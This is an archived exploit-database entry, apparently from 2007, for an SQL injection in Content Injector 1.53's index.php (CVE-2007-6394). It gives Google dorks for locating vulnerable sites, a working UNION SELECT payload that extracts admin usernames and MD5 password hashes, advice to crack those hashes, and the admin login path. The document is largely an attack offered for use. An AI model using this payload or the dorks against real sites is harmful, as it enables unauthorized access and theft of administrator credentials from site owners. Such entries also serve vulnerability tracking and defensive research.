Content Injector 1.53 - 'index.php' SQL Injection
Author: S.W.A.T.
type: webapps
platform: php
port:
date_added: 2007-12-08
date_updated: 2016-10-20
verified: 1
codes: OSVDB-39111;CVE-2007-6394
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comcinj153.zip
--==+================================================================================+==--
--==+ Content Injector V1.53 SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: S.W.A.T.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
Download: http://www.p3mbo.com/cinj153.zip
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DORK (google): "Powered by Content Injector v1.53"
Dork2(google): Powered by Content Injector v1.53
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DESCRIPTION:
You Can See Admin User & MD5 Password ..::.. Then You Can Crack It ;)
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
EXPLOITS:
www.site.com/index.php?action=expand&id=99999/**/union/**/select/**/1,2,username,4,5,password,7,8,9/**/from/**/users/*
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
NOTE/TIP:
admin login is at /admin/ It Is New Version With New Query & Different Between The Last One I Found
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
About Me:
Maybe I Give Bye To NET :( 1 month later :((
I'm Suposed To Die These Days
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GREETZ: All Xmors Digital Security Team - Str0ke
Own Page: wWw.SvvaT.IR
Group Site: wWw.XmorS.CoM
--==+================================================================================+==--
--==+ Content Injector V1.53 SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2007-12-09]